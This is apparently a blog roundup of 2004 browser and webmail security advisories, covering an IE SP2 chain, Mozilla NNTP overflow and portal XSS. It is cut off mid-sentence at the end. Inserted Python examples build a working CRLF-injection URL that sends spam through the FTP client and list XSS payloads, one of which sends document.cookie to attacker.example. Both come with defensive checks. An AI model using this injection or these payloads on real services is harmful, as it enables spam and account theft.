Although hundreds of millions of dollars have been spent on securing SP2, perfection is impossible. Through the joint effort of Michael Evanchik and Paul from Greyhats Security, a very critical vulnerability has been developed that can compromise a user’s system with no user interaction beyond visiting a malicious page. It is not a single new vulnerability in itself; rather, it chains multiple known holes in SP2, including the Help ActiveX Control Related Topics Zone Security Bypass Vulnerability and the Help ActiveX Control Related Topics Cross Site Scripting Vulnerability.
* Microsoft Internet Explorer 6.0
* Microsoft Windows XP Pro SP2
* Microsoft Windows XP Home SP2
Proof of Concept:
See a proof of concept of the above at: http://freehost07.websamba.com/greyhats/sp2rc.htm
* If an error is shown, press OK. This is normal.
* Notice in your startup menu a new file called Microsoft Office.hta. When run, this file will download and launch a harmless executable (which includes a pretty neat fire animation)
Workarounds:
* Disable HTA files
* Disable Active Scripting in Internet Explorer
Both Internet Explorer and Konqueror can be tricked into sending mail through their FTP clients with no more user interaction than loading a page.
* Internet Explorer version 6 SP1
* Konqueror version 3.2
* Mozilla Firefox version 1.0
Both Internet Explorer and Konqueror accept %0a and %0d (percent-encoded line feed and carriage return) in URLs, and in FTP URLs they accept them in the username part. The FTP client sends that username as one line of the login dialogue, so an injected CRLF lets further attacker-chosen lines follow it; because FTP and SMTP are both line-oriented text protocols, a URL that points the FTP client at an SMTP port can be used to send mail.
Spammers could host web sites containing images whose URLs cause visitors’ browsers to spam more people. There are probably other protocols that the FTP client could be used to access maliciously in the same way.
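The exchange described above, as an added example that is not part of the advisory and not the code of either browser: a Python model of a naive FTP client that percent-decodes the user name from an ftp:// URL and sends it in a USER line with no control-character check, next to the check a hardened client should apply. Host names, addresses and the message body are constructed placeholders. The leading "USER x" line only earns a "500 unknown command" reply from an SMTP server, and the injected lines that follow are processed as a normal transaction.

```python
"""Added example: CR/LF injection through the userinfo part of an ftp:// URL.

This models the behaviour described in the advisory; it is not Internet
Explorer's or Konqueror's code. The hosts and addresses are placeholders.
"""
from urllib.parse import quote, unquote, urlsplit

CRLF = "\r\n"


def injection_url(ftp_host: str, port: int, sender: str, rcpt: str, body: str) -> str:
    """Build an ftp:// URL whose user name smuggles a complete SMTP transaction.

    Everything in the user name is percent-encoded (including ':' and '@',
    which would otherwise terminate the userinfo), so the URL parses cleanly.
    """
    smtp_session = CRLF.join([
        "HELO example",
        f"MAIL FROM:<{sender}>",
        f"RCPT TO:<{rcpt}>",
        "DATA",
        "Subject: hello",
        "",
        body,
        ".",
        "QUIT",
    ])
    user = "x" + CRLF + smtp_session          # "x" is the throwaway FTP user name
    return f"ftp://{quote(user, safe='')}@{ftp_host}:{port}/"


def naive_ftp_login_lines(url: str) -> list[str]:
    """What a vulnerable client transmits at login: a USER line built from the
    decoded user name, with no control-character check. Returned as the list
    of CRLF-separated lines that actually hit the wire."""
    parts = urlsplit(url)
    user = unquote(parts.username or "anonymous")
    wire = "USER " + user + CRLF
    if parts.password is not None:
        wire += "PASS " + unquote(parts.password) + CRLF
    return wire.split(CRLF)[:-1]              # drop the empty string after the final CRLF


def smtp_verbs_on_wire(url: str) -> list[str]:
    """First word of every line the naive client sends: the SMTP server's view."""
    return [line.split(" ", 1)[0] for line in naive_ftp_login_lines(url)]


def userinfo_is_clean(url: str) -> bool:
    """Hardened check a client should apply before using URL credentials:
    reject any C0 control character (CR, LF, NUL, ...) or DEL in the *decoded*
    user name or password. Checking the raw, still-encoded string is not enough."""
    parts = urlsplit(url)
    for field in (parts.username, parts.password):
        if field is None:
            continue
        if any(ord(c) < 0x20 or ord(c) == 0x7F for c in unquote(field)):
            return False
    return True


if __name__ == "__main__":
    url = injection_url("mail.example.org", 25, "spam@example.net",
                        "victim@example.org", "constructed message body")
    print(url)
    for line in naive_ftp_login_lines(url):
        print(repr(line))
    print("userinfo clean:", userinfo_is_clean(url))
```

The URL is pointed at port 25 rather than 21 precisely because the FTP client does not care which service answers; the hardened check refuses the URL before any connection is made, and it inspects the decoded value because the raw URL contains only `%0D%0A`.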
Description: A heap overflow vulnerability was reported in Mozilla in the processing of NNTP URLs. A remote user can execute arbitrary code on the target system.
Maurycy Prodeus of iSEC Security Research reported that a remote user can create a specially crafted ‘news://’ URL that, when loaded by the target user, will trigger a buffer overflow and execute arbitrary code on the target user’s system. The code will run with the privileges of the target user.
The flaw resides in the MSG_UnEscapeSearchUrl() function in ‘nsNNTPProtocol.cpp’.
The original advisory is available at: http://isec.pl/vulnerabilities/isec-0020-mozilla.txt
Impact: A remote user can create a URL that, when loaded by the target user, will execute arbitrary code on the target user’s system with the privileges of the target user.
Solution: The vendor has issued a fixed version (1.7.5), available at: http://www.mozilla.org/products/mozilla1.x/
ShredderSub7 SecExpert wrote:
“——————Which systems are vulnerable?——–
Any system running any Microsoft Windows XP edition with Internet Explorer 6 or higher, even with SP2 applied.
Any system running any Microsoft Windows Server 2003 edition with Internet Explorer 6 or higher.
——————How does this exploit work?———–
The problem with Internet Explorer is that it doesn’t set any restrictions on web pages that request opening a Windows Help file, compiled with HTML Help.
Without a restriction, we can (in Internet Explorer) easily command to open any local web page stored on a victim’s computer, including web pages that are found in Windows Help files (with extension .CHM). ”
Proof of concept was provided.
More info in http://securityfocus.com/archive/1/385573/2004-12-26/2005-01-01/0
The email services of several big Indian portals are susceptible to scripting attacks, i.e., malicious code can be embedded by attackers into email messages that, when received by unsuspecting users, can cause harmful effects. The services are Rediffmail.com, Indiatimes.com and Sify.com. The combined user base of these services runs into millions, and all of these users are vulnerable. I’ve known about most of these vulnerabilities for years now, and I am now releasing them because many are being massively exploited in the wild. All attempts to contact the vendors were unfruitful.
It is possible to embed malicious scripts in an ordinary email to users of these services because of certain flaws in their anti-scripting filters. Since these filters are not as robust as the filters used by service providers like Yahoo and Hotmail, many more flaws, similar to those detailed here, are undoubtedly present in these services. Some of the attacks possible through exploitation of these flaws:
1. User names and passwords can be stolen. Spoofed login pages are one of the many methods to do so
2. Web pages belonging to the portals can be spoofed, including the shopping cart system
3. Any action that the legitimate user can take can also be taken by the malicious code. Cookies can be stolen
4. Malicious programs can be executed when combined with browser vulnerabilities
5. Force-feeding websites to users. Spammers, phishers and scammers can redirect users to their own pages
6. A malicious worm can be created which can traverse through the entire user base and cause destruction
7. Users can be locked out of their inboxes
Rediffmail has the most robust security system among all three. However, it is still susceptible to several attacks.
Indiatimes Mail (http://email.indiatimes.com):
Indiatimes email does not have a scripting filter in place. This means all HTML tags including scripts can be embedded into the email without any security obstacles.
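Why a filter that merely deletes script tags is not a scripting filter, as an added example that is not part of the advisory and is not any of the portals’ actual code: a blacklist filter of the kind described above beside an allow-list sanitizer that rebuilds the message from permitted tags, attributes and URL schemes. The payloads are constructed for illustration; the hypothetical attacker host is a placeholder.

```python
"""Added example: blacklist tag stripping versus an allow-list sanitizer.

naive_filter() is the kind of filter the advisory describes as easy to
bypass; sanitize() keeps only allow-listed markup. Neither is any portal's
real filter, and the PAYLOADS are constructed test inputs.
"""
import re
from html import escape
from html.parser import HTMLParser

SCRIPT_TAG = re.compile(r"</?script[^>]*>", re.IGNORECASE)


def naive_filter(message: str) -> str:
    """Blacklist approach: delete <script> and </script> tags, pass everything else."""
    return SCRIPT_TAG.sub("", message)


ALLOWED_TAGS = {"p", "b", "i", "u", "br", "a", "img"}
VOID_TAGS = {"br", "img"}
ALLOWED_ATTRS = {"a": {"href"}, "img": {"src", "alt"}}
SAFE_SCHEMES = ("http://", "https://", "mailto:")


class AllowListSanitizer(HTMLParser):
    """Emit only allow-listed tags and attributes; everything else is dropped
    or re-escaped as text, so <script> and event handlers never reach the output."""

    def __init__(self) -> None:
        super().__init__(convert_charrefs=True)
        self.out: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag not in ALLOWED_TAGS:
            return                            # unknown tag (e.g. script) is dropped
        kept = []
        for name, value in attrs:
            if name not in ALLOWED_ATTRS.get(tag, set()) or value is None:
                continue                      # drops onerror=, onclick=, style=, ...
            if name in ("href", "src"):
                # browsers ignore control characters inside a scheme name, so
                # strip them before checking ("java\tscript:" would otherwise pass)
                scheme_view = re.sub(r"[\x00-\x20]", "", value).lower()
                if not scheme_view.startswith(SAFE_SCHEMES):
                    continue                  # drops javascript:, data:, vbscript:, ...
            kept.append(f' {name}="{escape(value, quote=True)}"')
        self.out.append(f"<{tag}{''.join(kept)}>")

    def handle_endtag(self, tag):
        if tag in ALLOWED_TAGS and tag not in VOID_TAGS:
            self.out.append(f"</{tag}>")

    def handle_data(self, data):
        self.out.append(escape(data))         # text is always re-escaped, so the
                                              # body of a dropped <script> comes out inert


def sanitize(message: str) -> str:
    parser = AllowListSanitizer()
    parser.feed(message)
    parser.close()
    return "".join(parser.out)


PAYLOADS = [  # constructed test inputs; attacker.example is a placeholder host
    "<script>document.location='http://attacker.example/?c='+document.cookie</script>",
    '<img src="x" onerror="alert(document.cookie)">',
    '<a href="javascript:alert(document.cookie)">click</a>',
    '<a href="java\tscript:alert(1)">click</a>',
    "<scr<script>ipt>alert(1)</scr</script>ipt>",   # survives single-pass tag deletion
]


def still_scriptable(html: str) -> bool:
    """Crude detector used only to compare the two filters' output."""
    low = html.lower()
    return ("<script" in low or "onerror" in low
            or "script:" in re.sub(r"\s", "", low))


if __name__ == "__main__":
    for payload in PAYLOADS:
        print("naive    :", naive_filter(payload))
        print("allowlist:", sanitize(payload))
```

The last payload shows the classic failure of a single deletion pass: removing the inner `<script>` and `</script>` reassembles the outer halves into a working script tag. The allow-list parser never has that problem because it decides what to emit rather than what to remove.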
Several unsuccessful attempts have been made to contact the vendors. Email alerts did not receive responses.
Complete details in http://www.securiteam.com/securitynews/6X00K20C1U.html
Lycos’s Free Email service “allows users to have their own web based email account very much like Hotmail”. A cross site scripting vulnerability in Lycos’s Free Email service allows an attacker to steal a user’s cookie, giving him full access to the user’s Lycos email account. Further, due to a flaw in the way Lycos handles cookies, even if the user being attacked changes his password, the attacker can still gain access to the account because the cookie remains valid.
Proof of Concept was provided.
Another security program that is interesting to try; I think one attractive feature of this toolbar is that a user can report a phished URL to help other people, because once it is confirmed as a phishing URL it is blocked, so other users will not become victims.
Netcraft Anti-Phishing Toolbar Available for Download
“The Netcraft Toolbar uses Netcraft’s enormous databases of web site information to show you all the attributes of each site you visit on the Web, including the sites’ hosting location, country, longevity and popularity.
Toolbar features include:
Clear display of sites’ hosting location at all times helps you validate fraudulent urls (e.g. the main online banking site of a large US bank is unlikely to be hosted in the former Soviet Union).
Once you report a phishing URL, it is blocked for other community members subsequently accessing it. The leverage of widely disseminated attacks (people constructing phishing attacks send literally millions of electronic mails in the expectation that some will reach customers of the bank) is utilized to expedite blocking of the fraud site.
Natively traps cross site scripting and other suspicious urls containing characters which have no common purpose other than to deceive.
Netcraft supervisor validation is used to contain the impact of any false reporting of urls.
Display of browser navigational controls (toolbar & address bar) in all windows, to defend against pop up windows which attempt to hide the navigational controls to disguise location.
Happily coexists with Google and other Toolbars.”
Read more in http://news.netcraft.com/archives/2004/12/28/netcraft_antiphishing_toolbar_available_for_download.html
A tutorial is also available – http://toolbar.netcraft.com/help/tutorials/using.html
A vulnerability was reported in CleanCache. A local user can obtain files that have ostensibly been wiped from the computer.
WBG Links reported that a local user can invoke common data recovery tools to obtain files that should have been removed by CleanCache.
The vendor has been notified.
Impact: A local user can recover files that have ostensibly been deleted (disclosure of system information, disclosure of user information).
Solution: No solution was available at the time of this entry.
Exploit Included: Yes
“Although the Court ruled against Microsoft’s request for interim measures, the company is encouraged by a number of aspects of the Court’s discussion of the merits of the case.”
Juergen Schmidt wrote in http://securityfocus.com/archive/1/385463/2004-12-22/2004-12-28/0:
The new Santy version not only attacks phpBB.
It uses the Brazilian Google site to find all kinds of PHP scripts.
It parses their URLs and overwrites variables with strings